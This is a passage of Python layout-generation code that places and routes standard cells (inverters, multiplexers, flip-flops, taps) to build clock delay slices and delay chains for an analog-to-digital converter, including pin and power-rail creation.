laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=pdict[iinv11.name]['I'], gridname=rg_m3m4)
#laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rout0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='right')
# power pin
create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelayslice_compact_2x(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4,
m=2, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
inv_name = 'inv_' + str(m) + 'x'
mux_name = 'mux2to1_' + str(m) + 'x'
# placement
isel0 = laygen.place(name="I" + objectname_pfix + 'INVSEL0', templatename=inv_name,
gridname=pg, xy=origin, template_libname=templib_logic)
iinv11 = laygen.relplace(name="I" + objectname_pfix + 'INV11', templatename=inv_name,
gridname=pg, refinstname=isel0.name, template_libname=templib_logic)
iinv12 = laygen.relplace(name="I" + objectname_pfix + 'INV12', templatename=inv_name,
gridname=pg, refinstname=iinv11.name, template_libname=templib_logic)
iinv13 = laygen.relplace(name="I" + objectname_pfix + 'INV13', templatename=inv_name,
gridname=pg, refinstname=iinv12.name, template_libname=templib_logic)
iinv14 = laygen.relplace(name="I" + objectname_pfix + 'INV14', templatename=inv_name,
gridname=pg, refinstname=iinv13.name, template_libname=templib_logic)
imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
gridname=pg, refinstname=iinv14.name, template_libname=templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=isel0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1
y0 = pdict[isel0.name]['I'][0][1] + 0
#route-sel
[rv0, rsel0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['I'][0],
pdict[imux0.name]['EN1'][0], y0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[isel0.name]['O'][0],
pdict[imux0.name]['EN0'][0], y0+1, rg_m3m4)
#route-input
rv0, rin0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['I0'][0],
np.array([x0, y0+2]), rg_m3m4)
rv0, rin1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['I'][0],
np.array([x0, y0+2]), rg_m3m4)
#route-path1
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv11.name]['O'][0],
pdict[iinv12.name]['I'][0], y0+3, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv12.name]['O'][0],
pdict[iinv13.name]['I'][0], y0+5, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv13.name]['O'][0],
pdict[iinv14.name]['I'][0], y0+3, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv14.name]['O'][0],
pdict[imux0.name]['I1'][0], y0+5, rg_m3m4)
#route-output
#rv0, rout0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
# np.array([x1, y0+2]), rg_m3m4)
#pins
laygen.create_boundary_pin_form_rect(rin0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL", laygen.layers['pin'][4], size=6, direction='left')
laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=pdict[imux0.name]['O'], gridname=rg_m3m4)
# power pin
create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=isel0, inst_right=imux0)
def generate_sarclkdelay(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
tap_name = 'tap'
slice_name = 'sarclkdelayslice'
space_1x_name = 'space_1x'
space_2x_name = 'space_2x'
space_4x_name = 'space_4x'
# placement
itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
gridname = pg, xy=origin, template_libname = templib_logic)
islice3 = laygen.relplace(name="I" + objectname_pfix + 'SL3', templatename=slice_name,
gridname=pg, refinstname=itapl.name, template_libname=workinglib, transform='MY')
islice2 = laygen.relplace(name="I" + objectname_pfix + 'SL2', templatename=slice_name,
gridname=pg, refinstname=islice3.name, template_libname=workinglib, transform='MY')
islice1 = laygen.relplace(name="I" + objectname_pfix + 'SK1', templatename=slice_name,
gridname=pg, refinstname=islice2.name, template_libname=workinglib, transform='MY')
islice0 = laygen.relplace(name="I" + objectname_pfix + 'SL0', templatename=slice_name,
gridname=pg, refinstname=islice1.name, template_libname=workinglib, transform='MY')
isp4x = []
isp2x = []
isp1x = []
refi=islice0.name
if not m_space_4x==0:
isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
shape = np.array([m_space_4x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp4x[-1].name
if not m_space_2x==0:
isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
shape = np.array([m_space_2x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp2x[-1].name
if not m_space_1x==0:
isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
shape=np.array([m_space_1x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp1x[-1].name
itapr=laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
gridname = pg, refinstname = refi, template_libname = templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=islice0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=islice3.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=islice3.cellname, gridname=rg_m3m4, libname=workinglib)[0] - 1
y0 = pdict[islice0.name]['I'][0][1] + 0
#route-backtoback
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='O', refinstname1=islice1.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice1.name, refpinname0='O', refinstname1=islice2.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice2.name, refpinname0='O', refinstname1=islice3.name, refpinname1='I')
#route-sel
rsel0 = laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([x0, y0-2]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='SEL')
rv0, rsel1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice1.name]['SEL'][0],
np.array([x0, y0-4]), rg_m3m4)
rv0, rsel2 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice2.name]['SEL'][0],
np.array([x0, y0-5]), rg_m3m4)
rv0, rsel3 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice3.name]['SEL'][0],
np.array([x0, y0-6]), rg_m3m4)
#pins
laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice0.name]['I'], gridname=rg_m3m4)
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL<0>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel1, rg_m3m4, "SEL<1>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel2, rg_m3m4, "SEL<2>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel3, rg_m3m4, "SEL<3>", laygen.layers['pin'][4], size=6, direction='right')
#[rh0, rv0, rh1] = laygen.route_hvh(laygen.layers['metal'][4], laygen.layers['metal'][3],
# pdict[islice3.name]['O'][0], np.array([x0, pdict[islice3.name]['O'][1][1]-3]),
# pdict[islice3.name]['O'][1][0], rg_m3m4)
#laygen.create_boundary_pin_form_rect(rh1, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='left')
laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=pdict[islice3.name]['O'], gridname=rg_m3m4)
# power pin
#create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=itapl, inst_right=itapr)
# power pin
pwr_dim=laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
rvdd = []
rvss = []
rp1='VDD'
for i in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
for j in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
def generate_sarclkdelay_compact(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
tap_name = 'tap'
slice_name = 'sarclkdelayslice_compact'
space_1x_name = 'space_1x'
space_2x_name = 'space_2x'
space_4x_name = 'space_4x'
# placement
itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
gridname = pg, xy=origin, template_libname = templib_logic)
islice3 = laygen.relplace(name="I" + objectname_pfix + 'SL3', templatename=slice_name,
gridname=pg, refinstname=itapl.name, template_libname=workinglib, transform='MY')
islice2 = laygen.relplace(name="I" + objectname_pfix + 'SL2', templatename=slice_name,
gridname=pg, refinstname=islice3.name, template_libname=workinglib, transform='MY')
islice1 = laygen.relplace(name="I" + objectname_pfix + 'SK1', templatename=slice_name,
gridname=pg, refinstname=islice2.name, template_libname=workinglib, transform='MY')
islice0 = laygen.relplace(name="I" + objectname_pfix + 'SL0', templatename=slice_name,
gridname=pg, refinstname=islice1.name, template_libname=workinglib, transform='MY')
isp4x = []
isp2x = []
isp1x = []
refi=islice0.name
if not m_space_4x==0:
isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
shape = np.array([m_space_4x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp4x[-1].name
if not m_space_2x==0:
isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
shape = np.array([m_space_2x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp2x[-1].name
if not m_space_1x==0:
isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
shape=np.array([m_space_1x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp1x[-1].name
itapr=laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
gridname = pg, refinstname = refi, template_libname = templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=islice0.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=islice3.name, gridname=rg_m3m4)[0]\
+laygen.get_template_size(name=islice3.cellname, gridname=rg_m3m4, libname=workinglib)[0] - 1
y0 = pdict[islice0.name]['I'][0][1] + 0
#route-backtoback
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='O', refinstname1=islice1.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice1.name, refpinname0='O', refinstname1=islice2.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice2.name, refpinname0='O', refinstname1=islice3.name, refpinname1='I')
#route-sel
rsel0 = laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([x0, y0-2]), gridname0=rg_m3m4,
refinstname0=islice0.name, refpinname0='SEL')
rv0, rsel1 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice1.name]['SEL'][0],
np.array([x0, y0-4]), rg_m3m4)
rv0, rsel2 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice2.name]['SEL'][0],
np.array([x0, y0-5]), rg_m3m4)
rv0, rsel3 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice3.name]['SEL'][0],
np.array([x0, y0-6]), rg_m3m4)
#pins
laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice0.name]['I'], gridname=rg_m3m4)
laygen.create_boundary_pin_form_rect(rsel0, rg_m3m4, "SEL<0>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel1, rg_m3m4, "SEL<1>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel2, rg_m3m4, "SEL<2>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel3, rg_m3m4, "SEL<3>", laygen.layers['pin'][4], size=6, direction='right')
#[rh0, rv0, rh1] = laygen.route_hvh(laygen.layers['metal'][4], laygen.layers['metal'][3],
# pdict[islice3.name]['O'][0], np.array([x0, pdict[islice3.name]['O'][1][1]-3]),
# pdict[islice3.name]['O'][1][0], rg_m3m4)
#laygen.create_boundary_pin_form_rect(rh1, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='left')
laygen.pin(name='O', layer=laygen.layers['pin'][4], xy=pdict[islice3.name]['O'], gridname=rg_m3m4)
# power pin
#create_power_pin_from_inst(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, inst_left=itapl, inst_right=itapr)
# power pin
pwr_dim=laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
rvdd = []
rvss = []
rp1='VDD'
for i in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-2), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-2), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
laygen.pin_from_rect('VDD'+str(2*i-1), laygen.layers['pin'][3], rvdd[-1], gridname=rg_m2m3, netname='VDD')
laygen.pin_from_rect('VSS'+str(2*i-1), laygen.layers['pin'][3], rvss[-1], gridname=rg_m2m3, netname='VSS')
for j in range(1, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j+1, 0]), xy1=np.array([2*j+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]), addvia0=True,
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*j, 0]), xy1=np.array([2*j, 0]), gridname0=rg_m2m3,
refinstname0=itapr.name, refpinname0='VDD', refinstindex0=np.array([0, 0]),
refinstname1=itapr.name, refpinname1='VSS', refinstindex1=np.array([0, 0]), addvia1=True))
def generate_sarclkdelay_compact_dual(laygen, objectname_pfix, templib_logic, workinglib, placement_grid, routing_grid_m3m4,
m_space_4x=0, m_space_2x=0, m_space_1x=0, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
tap_name = 'tap'
tie_name = 'tie_2x'
dff_name = 'dff_rsth_1x'
inv_name = 'inv_1x'
mux_name = 'mux2to1_1x'
slice_name = 'sarclkdelayslice_compact'
slice_2x_name = 'sarclkdelayslice_compact_2x'
space_1x_name = 'space_1x'
space_2x_name = 'space_2x'
space_4x_name = 'space_4x'
# placement
itapl = laygen.place(name = "I" + objectname_pfix + 'TAPL0', templatename = tap_name,
gridname = pg, xy=origin, template_libname = templib_logic)
imux0 = laygen.relplace(name="I" + objectname_pfix + 'MUX0', templatename=mux_name,
gridname=pg, refinstname=itapl.name, template_libname=templib_logic, transform='MY')
iinv0 = laygen.relplace(name="I" + objectname_pfix + 'INV0', templatename=inv_name,
gridname=pg, refinstname=imux0.name, template_libname=templib_logic, transform='MY')
idff0 = laygen.relplace(name="I" + objectname_pfix + 'DFF0', templatename=dff_name,
gridname=pg, refinstname=iinv0.name, template_libname=templib_logic, transform='MY')
itie0 = laygen.relplace(name="I" + objectname_pfix + 'TIE0', templatename=tie_name,
gridname=pg, refinstname=idff0.name, template_libname=templib_logic, transform='MY')
islice11 = laygen.relplace(name="I" + objectname_pfix + 'SL11', templatename=slice_2x_name,
gridname=pg, refinstname=itie0.name, template_libname=workinglib, transform='MY')
islice10 = laygen.relplace(name="I" + objectname_pfix + 'SL10', templatename=slice_name,
gridname=pg, refinstname=islice11.name, template_libname=workinglib, transform='MY')
islice01 = laygen.relplace(name="I" + objectname_pfix + 'SL01', templatename=slice_2x_name,
gridname=pg, refinstname=islice10.name, template_libname=workinglib, transform='MY')
islice00 = laygen.relplace(name="I" + objectname_pfix + 'SL00', templatename=slice_name,
gridname=pg, refinstname=islice01.name, template_libname=workinglib, transform='MY')
isp4x = []
isp2x = []
isp1x = []
refi=islice00.name
if not m_space_4x==0:
isp4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP4X0', templatename=space_4x_name,
shape = np.array([m_space_4x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp4x[-1].name
if not m_space_2x==0:
isp2x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2X0', templatename=space_2x_name,
shape = np.array([m_space_2x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp2x[-1].name
if not m_space_1x==0:
isp1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP1X0', templatename=space_1x_name,
shape=np.array([m_space_1x, 1]), gridname=pg,
refinstname=refi, template_libname=templib_logic))
refi = isp1x[-1].name
itapr=laygen.relplace(name = "I" + objectname_pfix + 'TAPR0', templatename = tap_name,
gridname = pg, refinstname = refi, template_libname = templib_logic)
# internal pins
pdict = laygen.get_inst_pin_coord(None, None, rg_m3m4)
# internal routes
x0 = laygen.get_inst_xy(name=islice00.name, gridname=rg_m3m4)[0] + 1
x1 = laygen.get_inst_xy(name=imux0.name, gridname=rg_m3m4)[0]\
-laygen.get_template_size(name=imux0.cellname, gridname=rg_m3m4, libname=templib_logic)[0] - 1 + 2
#x1 = laygen.get_inst_xy(name=islice11.name, gridname=rg_m3m4)[0]\
# +laygen.get_template_size(name=islice11.cellname, gridname=rg_m3m4, libname=workinglib)[0] - 1
y0 = pdict[islice00.name]['I'][0][1] + 2
#route-backtoback
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice00.name, refpinname0='O', refinstname1=islice01.name, refpinname1='I')
laygen.route(None, laygen.layers['metal'][4], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m3m4,
refinstname0=islice10.name, refpinname0='O', refinstname1=islice11.name, refpinname1='I')
#route-sel
rv0, rsel00 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['SEL'][0],
np.array([x0, y0-2]), rg_m3m4)
rv0, rsel01 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice01.name]['SEL'][0],
np.array([x0, y0+2]), rg_m3m4)
rv0, rsel10 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice10.name]['SEL'][0],
np.array([x0, y0-4]), rg_m3m4)
rv0, rsel11 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice11.name]['SEL'][0],
np.array([x0, y0-5]), rg_m3m4)
#route-tie
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[itie0.name]['TIEVSS'][0],
pdict[idff0.name]['I'][0], y0-2, rg_m3m4)
#route-en1
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv0.name]['I'][0],
pdict[idff0.name]['O'][0], y0-5, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['EN1'][0],
pdict[idff0.name]['O'][0], y0-5, rg_m3m4)
#route-en0
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[iinv0.name]['O'][0],
pdict[imux0.name]['EN0'][0], y0-3, rg_m3m4)
#route-o0
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice01.name]['O'][0],
pdict[imux0.name]['I0'][0], y0+2, rg_m3m4)
#route-o1
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice11.name]['O'][0],
pdict[imux0.name]['I1'][0], y0+1, rg_m3m4)
#route-rst
rv0, rrst0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[idff0.name]['RST'][0],
np.array([x1, y0+3]), rg_m3m4)
#route-sb
rv0, rsb0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[idff0.name]['CLK'][0],
np.array([x1, y0+4-4]), rg_m3m4)
#route-out
rv0, ro0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[imux0.name]['O'][0],
np.array([x1, y0-2]), rg_m3m4)
#route-input
rv0, ri0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['I'][0],
np.array([x0, y0-3]), rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], pdict[islice00.name]['I'][0],
pdict[islice10.name]['I'][0], y0-3, rg_m3m4)
#pins
#laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=pdict[islice00.name]['I'], gridname=rg_m3m4)
laygen.create_boundary_pin_form_rect(ri0, rg_m3m4, "I", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel00, rg_m3m4, "SEL0<0>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel01, rg_m3m4, "SEL0<1>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel10, rg_m3m4, "SEL1<0>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rsel11, rg_m3m4, "SEL1<1>", laygen.layers['pin'][4], size=6, direction='right')
laygen.create_boundary_pin_form_rect(rrst0, rg_m3m4, "RST", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(rsb0, rg_m3m4, "SB", laygen.layers['pin'][4], size=6, direction='left')
laygen.create_boundary_pin_form_rect(ro0, rg_m3m4, "O", laygen.layers['pin'][4], size=6, direction='left')
# power pin
pwr_dim=laygen.get_template_size(name=itapl.cellname, gridname=rg_m2m3, libname=itapl.libname)
rvdd = []
rvss = []
rp1='VDD'
for i in range(0, int(pwr_dim[0]/2)):
rvdd.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i, 0]), xy1=np.array([2*i, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
rvss.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl.name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl.name, refpinname1=rp1, refinstindex1=np.array([0, 0])))
